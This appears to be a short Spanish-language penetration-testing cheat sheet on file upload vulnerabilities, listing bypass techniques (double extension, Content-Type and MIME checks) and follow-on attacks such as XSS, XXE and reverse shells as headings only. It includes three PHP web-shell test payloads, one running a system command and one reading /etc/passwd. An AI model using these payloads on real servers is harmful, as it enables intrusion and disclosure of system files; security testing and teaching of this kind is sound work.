File upload
General
# PHP
<?php echo "test"; ?>
<?php system("hostname"); ?>
<?php echo file_get_contents("/etc/passwd"); ?>Bypass de filtros
Validación del lado del cliente
Validación de extensiones con lista negra (blacklist) y blanca (whitelist)
Doble extensión
Doble extensión inversa
Caracteres especiales
Validación de tipo de contenido (Content-Type)
Validación de MIME-Type
Desde file upload a otras vulnerabilidades
SVG
Cross-site scripting (XSS)
XML external entity (XXE)
ZIP
Reverse shell
Última actualización